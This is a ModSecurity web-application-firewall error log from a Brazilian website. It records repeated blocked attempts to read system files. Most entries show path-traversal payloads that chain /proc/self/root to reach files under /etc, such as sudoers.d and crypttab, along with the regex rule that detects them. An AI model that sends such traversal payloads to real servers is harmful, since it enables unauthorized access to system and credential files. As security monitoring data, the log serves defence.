[Fri Mar 20 12:28:26.013164 2026] [:error] [pid 10189:tid 140411666392832] [client 74.7.241.31:39298] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/nsswitch.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nmTJ3M9BSuKP7CAZj1QAAAIk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:28:27.391036 2026] [:error] [pid 7235:tid 140411565680384] [client 74.7.241.31:47526] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/resolv.conf.save"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nm_qxLDW4GITHUkQkrwAAARU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:28:28.752809 2026] [:error] [pid 9818:tid 140411708356352] [client 74.7.241.31:47532] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/crypttab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nnF1pVZ5mVmJwsFNn0gAAAEQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:28:31.285634 2026] [:error] [pid 9818:tid 140411557287680] [client 74.7.241.31:47536] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nn11pVZ5mVmJwsFNn1QAAAFY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:28:33.625076 2026] [:error] [pid 7235:tid 140411716749056] [client 74.7.241.31:47550] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nofqxLDW4GITHUkQkuQAAAQM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:28:35.887516 2026] [:error] [pid 9818:tid 140411699963648] [client 74.7.241.31:47560] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1no11pVZ5mVmJwsFNn2AAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:28:37.184566 2026] [:error] [pid 10189:tid 140411649607424] [client 74.7.241.31:47572] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1npTJ3M9BSuKP7CAZj4AAAAIs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:28:38.312577 2026] [:error] [pid 15826:tid 140411616036608] [client 57.141.18.91:40016] [client 57.141.18.91] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1npuoXxyEfFpUF8f-5kQAAAU8"]
[Fri Mar 20 12:28:38.598914 2026] [:error] [pid 7893:tid 140411574073088] [client 74.7.241.31:40614] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nphCii7xarUs8iHakhQAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:28:39.921693 2026] [:error] [pid 7893:tid 140411741927168] [client 74.7.241.31:40630] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1npxCii7xarUs8iHakiAAAAgA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:28:41.627695 2026] [:error] [pid 21219:tid 140411658000128] [client 74.7.241.31:40636] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nqfXLqtnMIWvjpaLW4QAAAoo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:28:43.034693 2026] [:error] [pid 21219:tid 140411691570944] [client 74.7.241.31:40638] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nq_XLqtnMIWvjpaLW4gAAAoY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:28:44.286850 2026] [:error] [pid 21219:tid 140411557287680] [client 74.7.241.31:40640] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nrPXLqtnMIWvjpaLW4wAAApY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:28:45.791533 2026] [:error] [pid 11167:tid 140411649607424] [client 74.7.241.31:40648] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nrfHIg5MgXLBnicMt9AAAAcs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:28:49.736400 2026] [:error] [pid 10189:tid 140411641214720] [client 74.7.241.31:40656] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nsTJ3M9BSuKP7CAZj-QAAAIw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:28:51.083681 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.241.31:42450] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1ns-oXxyEfFpUF8f-5kwAAAUU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:28:52.460099 2026] [:error] [pid 11167:tid 140411641214720] [client 74.7.241.31:42456] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1ntPHIg5MgXLBnicMt9wAAAcw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:28:53.771011 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.241.31:42458] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1ntda6ubjKNq_cu4YXOwAAA00"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:28:56.179022 2026] [:error] [pid 31215:tid 140411708356352] [client 74.7.241.31:42462] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nuAF0L0L-SsrnPo6hpQAAAsQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:28:58.503739 2026] [:error] [pid 11642:tid 140411649607424] [client 74.7.241.31:47720] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nurninkcc-iUj5AqU1QAAA4s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:28:59.507701 2026] [:error] [pid 21219:tid 140411741927168] [client 216.73.216.191:40704] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1nu_XLqtnMIWvjpaLW6QAAAoA"]
[Fri Mar 20 12:28:59.773052 2026] [:error] [pid 7893:tid 140411708356352] [client 74.7.241.31:47722] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nuxCii7xarUs8iHakkQAAAgQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:29:01.090204 2026] [:error] [pid 9818:tid 140411691570944] [client 74.7.241.31:47738] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nvV1pVZ5mVmJwsFNn2QAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
